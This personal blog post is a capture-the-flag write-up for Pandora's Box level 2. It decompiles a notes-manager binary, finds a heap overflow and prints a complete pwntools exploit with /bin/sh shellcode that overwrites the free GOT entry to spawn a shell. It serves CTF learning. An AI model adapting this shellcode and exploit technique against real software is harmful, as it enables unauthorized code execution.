๐–ˆ๐–ž๐–‡๐–Š๐–—๐–Œ๐–š๐–—๐–š๐Ÿ’€~$

Hamza's Blog

View on GitHub

Pendoras Box Level 2 of 5

From the solution of the level 1 an executable and a README was provided on how to start up level 2 challenge

contents of the README file:

first we need to extract the executable file from the machine, this can be archived using socat, we use socat and create a local ftp server into our local machine and transfer the file over the connection as this would help for easy fuzzing and exploitation, after loading the file we tried to execute it, and we are greeted with a menu for Notes manager:

playing with the programm and performing fuzzing we realize that creating a new note and allocating more than 64 bits of data will cause the program to halt and throw us an error from malloc oneโ€™s you try to create a new note, from this outcome we could already guess that itโ€™s a heap overflow challenge (heap overflow challenge usually occurs when a challenge is provided with a menu of some sort which have options to create,assign and delete data from the memory)

letโ€™s decompile the binary and check what exactly is going on with the new and set options using ghidra

        iVar1 = strcmp(local_ac,"new");
        if (iVar1 == 0) {
          local_20 = get_empty_slot();
          if (local_20 == -1) {
            puts("[!] Note list is full, please free any");
          }
          else {
            uVar2 = create_struct();
            *(undefined4 *)(local_1c + local_20 * 4) = uVar2;
            printf("[*] New note created with id %d\n");
          }
        }
        else {
          iVar1 = strcmp(local_ac,"set");
          if (iVar1 == 0) {
            readline();
            local_20 = strtol(local_ac,(char **)0x0,10);
            iVar1 = slot_exists();
            if (iVar1 == 1) {
              readline();
              local_24 = *(size_t **)(local_1c + local_20 * 4);
              sVar3 = strlen(local_ac);
              *local_24 = sVar3;
              memcpy((void *)local_24[1],local_ac,*local_24);
              printf("[*] Note %d set\n");
            }

we could see that our input is collected from readline() and stored in iVar1 which is then compared with with each option there is in the list; once the comparision matches โ€œnewโ€, it first of check if there are space for creating a new note by calling the function get_empty_slot() which then returns either a -1 for full or 1 for more free space, the else part calls a create_struct() function which does the following:

size_t * create_struct(void)

{
  size_t *psVar1;
  void *pvVar2;
  
  psVar1 = (size_t *)malloc(8);
  *psVar1 = 0x40;
  pvVar2 = malloc(*psVar1);
  psVar1[1] = (size_t)pvVar2;
  mprotect((void *)(psVar1[1] & 0xfffff000),*psVar1,7);
  return psVar1;
}

This is the most important part of these challenge so letโ€™s break each line of decompiled code accordingly

The heap overflow occurs when the program writes data beyond the boundaries of a dynamically allocated heap buffer, potentially overwriting important data or control structures. In the above decompiled code, the allocations made by malloc are based on fixed sizes (8 bytes for psVar1 and *psVar1 bytes for pvVar2). Which we could overflow by writing more data than the allocated memory can hold. writing more than 64 bytes of data unto the heap could overflow the allocated memory by malloc. Letโ€™s switch to GDB to see just how much of input do we need to give the programm to spawn a lovely Shell ;)

I took the binary and load it into GDB for easy analysis, I use gdbpedaโ€™s cool utility of generating patterns so that we could easily see which part of the memory our input corrupted to, this would really save us a lot of time

after the input is supplied to the program, and a new note is created then as expected the program crashes with mallocโ€™s failure of corrupted top size, we then use gdbpeda pattern offset to see how much of data we need to overflow unto the stack.

we see itโ€™s 72 bytes any more of about 4 bytes would pop into the ebp register which is our main goal

knowing all this we use pwntools utility to write a script and a ropgadet to spawn a shell

#!/bin/python

from pwn import *
import struct

ellf = ELF('./level2')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')

try:
    #try connecting remote
    ip = '192.168.17.129'
    port = 53121

    print("[+] Connecting to Target {0}".format(ip))
    proc = remote(ip,port)
except:
    #connect local if remote not up
    print("using local executable:")
    proc = ellf.process()

rop = ROP(ellf)

# Creating new notes
print(proc.recvuntil(b">").decode())
print("{*]Creating Note")
proc.sendline(b'new')
print(proc.recvuntil(b">").decode())
proc.sendline(b"new")
print(proc.recvuntil(b">").decode())


print("[*] Crafting payload")
# print(rop.find_gadget(['pop ebp','ret']))
# getting the pop_ebp gadget and free GOT entry
pop_ebp = hex(rop.ebp.address)
free_adr = hex(ellf.got['free'])

# Crafting a shellcode
"""
Disassembly:

0:  6a 0b                   push   0xb ; push 0xb into the stack
2:  58                      pop    eax ; content of stack into eax
3:  99                      cdq        ; perfoms sign extention 
4:  52                      push   edx ; perfoms push of sign-extended eax into edx
5:  68 2f 2f 73 68          push   0x68732f2f ; pushes "/sh" onto the stack
a:  68 2f 62 69 6e          push   0x6e69622f ; pushes "/bin" onto the stack
f:  89 e3                   mov    ebx,esp    ; mov content of stack into ebx
11: 31 c9                   xor    ecx,ecx    ; set ecx to 0
13: cd 80                   int    0x80       ; invoking system call to execute content of ebx
                                              ; effectively calling "/bin/sh" that's our shell

"""

shellcode = b"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"

payload = shellcode + (76 - len(shellcode))*"A".encode()
payload += struct.pack('<L', int(free_adr,16))

print("[*]Sending payload to note 0: ",payload)
proc.sendline(b'set')
print(proc.recvuntil(b">").decode())
proc.sendline(b'0')
print(proc.recvuntil(b">").decode())
proc.sendline(payload)
print(proc.recvuntil(b">").decode())
print("[*] Payload sent to note 0 sucessfully")


print("[*] Sending payload to note 1")
payload = struct.pack("<L", int(pop_ebp,16))
proc.sendline(b'set')
print(proc.recvuntil(b">").decode())
proc.sendline(b'1')
print(proc.recvuntil(b">").decode())
proc.sendline(payload)
print(proc.recvuntil(b">").decode())
print("[*] Payload sent to note 1 sucessfully")

#executing payload stored in note 0 and note 1

proc.sendline(b"del")
proc.sendline(b"0")
print(proc.recvuntil(b">").decode())

print("[*] All payload sent successfully!!")

print("[*] Trying to get a sehll")

proc.interactive()

letโ€™s break down the code

Execuing the script gives us our lovely shell ;), which gives us access to level3 files

Thatโ€™s it guyโ€™s thanks for reading throughโ€ฆ.. Arigato